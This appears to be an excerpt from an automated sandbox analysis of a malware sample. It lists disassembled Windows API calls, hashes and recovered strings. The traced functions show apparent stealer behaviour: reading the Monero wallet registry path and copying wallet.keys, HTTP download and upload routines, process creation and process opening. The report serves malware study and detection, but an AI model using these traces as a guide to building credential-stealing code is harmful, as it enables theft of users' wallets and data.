                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                          • StrStrA.SHLWAPI(?,0079AB88), ref: 004143F3
                                          • GlobalFree.KERNEL32(?), ref: 00414512
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                          • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                          • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 1191620704-0
                                          • Opcode ID: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                          • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                          • Opcode Fuzzy Hash: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                          • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                          APIs
                                          • memset.MSVCRT ref: 00401327
                                            • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                            • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                            • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                            • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                            • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                          • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                          • lstrlenA.KERNEL32(?), ref: 0040135C
                                          • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                          • memset.MSVCRT ref: 00401516
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                          • API String ID: 1930502592-218353709
                                          • Opcode ID: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                          • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                          • Opcode Fuzzy Hash: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                          • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0079B138), ref: 00406303
                                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0079ABA0,00000000,00000000,00400100,00000000), ref: 00406385
                                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                          • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                          • lstrlenA.KERNEL32(00000000), ref: 00415383
                                          • strtok.MSVCRT(00000000,?), ref: 0041539E
                                          • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 3532888709-1526165396
                                          • Opcode ID: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                          • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                          • Opcode Fuzzy Hash: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                          • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                          • StrCmpCA.SHLWAPI(?,0079B138), ref: 00406147
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                          • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                          • InternetCloseHandle.WININET(a+A), ref: 00406253
                                          • InternetCloseHandle.WININET(00000000), ref: 00406260
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID: a+A$a+A
                                          • API String ID: 4287319946-2847607090
                                          • Opcode ID: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                          • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                          • Opcode Fuzzy Hash: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                          • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • memset.MSVCRT ref: 022D0E83
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0E9C
                                          • lstrcat.KERNEL32(?,00420D7C), ref: 022D0EAE
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0EC4
                                          • lstrcat.KERNEL32(?,00420D80), ref: 022D0ED6
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0EEF
                                          • lstrcat.KERNEL32(?,00420D84), ref: 022D0F01
                                          • lstrlen.KERNEL32(?), ref: 022D0F0E
                                          • memset.MSVCRT ref: 022D0F34
                                          • memset.MSVCRT ref: 022D0F48
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022D9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022D0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022D9948
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022D0FC1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022D0FCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID:
                                          • API String ID: 1395395982-0
                                          • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                          • Instruction ID: a685ae721c155f79dcaf4eb421fce70c855b875ad1e2f63a164b4a1933d12747
                                          • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                          • Instruction Fuzzy Hash: 5E81A5B5A20318ABCB14EBE0DD51FED733AAF54304F404599B30A66095EF746B88CF59
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • memset.MSVCRT ref: 022D0E83
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0E9C
                                          • lstrcat.KERNEL32(?,00420D7C), ref: 022D0EAE
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0EC4
                                          • lstrcat.KERNEL32(?,00420D80), ref: 022D0ED6
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D0EEF
                                          • lstrcat.KERNEL32(?,00420D84), ref: 022D0F01
                                          • lstrlen.KERNEL32(?), ref: 022D0F0E
                                          • memset.MSVCRT ref: 022D0F34
                                          • memset.MSVCRT ref: 022D0F48
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022D9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022D0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022D9948
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022D0FC1
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022D0FCD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID:
                                          • API String ID: 1395395982-0
                                          • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                          • Instruction ID: 6d95926cadfb206190f811555290e07144921651df6fe9686221a4d6a7b26356
                                          • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                          • Instruction Fuzzy Hash: A261B0B5520218ABCB14EBE0CD45FED773AAF54304F404599E70A66085EF746B88CF59
                                          APIs
                                            • Part of subcall function 022DAA87: lstrlen.KERNEL32(022C516C,?,?,022C516C,00420DDE), ref: 022DAA92
                                            • Part of subcall function 022DAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022DAAEC
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022D58AB
                                          • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022D5908
                                          • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022D5ABE
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022D5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022D548F
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022D557F
                                            • Part of subcall function 022D5527: lstrlen.KERNEL32(00000000), ref: 022D5596
                                            • Part of subcall function 022D5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022D55CB
                                            • Part of subcall function 022D5527: lstrlen.KERNEL32(00000000), ref: 022D55EA
                                            • Part of subcall function 022D5527: strtok.MSVCRT(00000000,?), ref: 022D5605
                                            • Part of subcall function 022D5527: lstrlen.KERNEL32(00000000), ref: 022D5615
                                          • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022D59F2
                                          • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022D5BA7
                                          • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022D5C73
                                          • Sleep.KERNEL32(0000EA60), ref: 022D5C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleepstrtok
                                          • String ID: 0.y$`.y$p.y
                                          • API String ID: 3630751533-686352929
                                          • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                          • Instruction ID: 1af09305d74362530d0da35a099b817916e056058a68f053c20b98348f7d0778
                                          • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                          • Instruction Fuzzy Hash: 7FE13071920304ABCB18FBF0DD96DED737AAF55300F90826CA50666198EF786B58CF91
                                          APIs
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A51
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A68
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A7F
                                            • Part of subcall function 022C4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022C4AA0
                                            • Part of subcall function 022C4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022C4AB0
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022C6548
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022C656A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022C659C
                                          • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022C65EC
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022C6626
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022C6638
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022C6664
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022C66D4
                                          • InternetCloseHandle.WININET(00000000), ref: 022C6756
                                          • InternetCloseHandle.WININET(00000000), ref: 022C6760
                                          • InternetCloseHandle.WININET(00000000), ref: 022C676A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID:
                                          • API String ID: 3074848878-0
                                          • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                          • Instruction ID: f1841affff3fbdaa65179cc0db45dea65a35379aca79ec3dd8e152fbdf1ec06f
                                          • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                          • Instruction Fuzzy Hash: 0F716E75A60318ABDB24DFE0CC48FEE7779FB44700F204299E10A6B194DBB46A84CF41
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022D92D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID:
                                          • API String ID: 2244384528-0
                                          • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                          • Instruction ID: 5a23ed16cdc49c01577237718a2dad425fcaf2495f5f427c4e63c325dd28a9fb
                                          • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                          • Instruction Fuzzy Hash: 6071FCB9950208ABDB14DFE4DC88FEEB7B9FF49300F108218F515A7294DB74A945CB61
                                          APIs
                                          • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                          • memset.MSVCRT ref: 0041716A
                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                          Strings
                                          • sA, xrefs: 004172AE, 00417179, 0041717C
                                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                          • sA, xrefs: 00417111
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenProcesslstrcpymemset
                                          • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                          • API String ID: 224852652-2614523144
                                          • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                          • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                          • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                          • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022D77A9
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022D77E6
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D786A
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D7871
                                          • wsprintfA.USER32 ref: 022D78A7
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\$B
                                          • API String ID: 1544550907-183544611
                                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction ID: 743dc7e5efefc5cd7aa3254724b8e7bc0f8ccdfbc4a72344be952a3f8f058a0e
                                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
